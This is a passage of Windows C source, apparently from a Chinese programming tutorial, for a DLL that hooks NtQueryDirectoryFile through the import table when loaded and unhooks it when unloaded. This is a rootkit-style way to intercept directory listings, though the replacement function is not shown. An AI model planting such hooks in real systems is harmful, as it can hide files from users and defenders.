ptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size==0) { return FALSE; } PIMAGE_IMPORT_DESCRIPTOR ImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)((ULONG)hModule+pNtHdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress); PIMAGE_THUNK_DATA ThunkData; while (ImportDescriptor->FirstThunk) { char* szDll = (char*)((ULONG)hModule+ImportDescriptor->Name); //遍历寻找Kernel32中加载的ntdll.dll if (stricmp(szDll,"ntdll.dll")!=NULL) { ImportDescriptor++; continue; } ThunkData = (PIMAGE_THUNK_DATA)((ULONG)hModule+ImportDescriptor->OriginalFirstThunk); int num = 1; while (ThunkData->u1.Function) { char* szFunc = (char*)((ULONG)hModule+ThunkData->u1.AddressOfData+2); if (stricmp(szFunc,"NtQueryDirectoryFile")==0) { PDWORD pFunc = (DWORD*)((ULONG)hModule+(DWORD)ImportDescriptor->FirstThunk)+(num-1); if (flag) { //Hook ULONG pNewFunc = (ULONG)NewZwQueryDirectoryFile; OldZwQueryDirectoryFile = (ZWQUERYDIRECTORYFILE)(*(ULONG*)pFunc); DWORD dwWrite = 0; WriteProcessMemory(GetCurrentProcess(),pFunc,&pNewFunc,sizeof(ULONG),&dwWrite); } else { //UnHook DWORD dwWrite = 0; WriteProcessMemory(GetCurrentProcess(),pFunc,(DWORD*)(&OldZwQueryDirectoryFile),sizeof(ULONG),&dwWrite); } return TRUE; } num++; ThunkData++; } ImportDescriptor++; } return FALSE; } BOOL APIENTRY DllMain( HANDLE hModule,DWORD dwReason,LPVOID lpReserved) { if (dwReason == DLL_PROCESS_ATTACH) { //HOOK ZwQueryDirectroyFile HookQueryFile(TRUE); www.2cto.com } else if (dwReason == DLL_PROCESS_DETACH) { //UnHook ZwQueryDirectoryFile HookQueryFile(FALSE); } return TRUE; } 作者:yincheng01
|